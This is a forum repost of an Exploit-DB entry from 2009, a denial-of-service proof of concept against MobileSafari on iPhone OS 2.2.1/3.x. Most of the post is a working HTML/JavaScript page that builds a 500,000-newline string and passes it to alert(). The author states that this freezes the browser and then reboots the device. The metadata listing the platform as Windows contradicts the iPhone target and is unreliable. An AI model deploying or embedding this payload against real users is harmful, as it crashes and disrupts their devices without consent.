Exploit Apple iPhone 2.2.1/3.x - MobileSafari Crash + Reboot (Denial of Service)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9554
Проверка EDB
  1. Пройдено
Автор
THELEADER
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2009-08-31
HTML:
# Apple iPhone (MobileSafari) Crash & Reboot
# TheLeader, GSOG [st0p] hotmail [sp4m] com
# Shoutz: hacking.org.il nullbyte.org.il

# Tested on iPod Touch 2G, OS 2.2.1
# Launch MobileSafari, enter the page and MobileSafari will freeze.
# Wait for 4-5 minutes and the device will spontaneously reboot.

# Exploit:

<html>
<body>
<script>
var a = '';
for (var i = 1; i <= 500000; i++)
{
  a += '\n';
}
alert(a);
</script>
</body>
</html>

# milw0rm.com [2009-08-31]
 
Источник
www.exploit-db.com

Похожие темы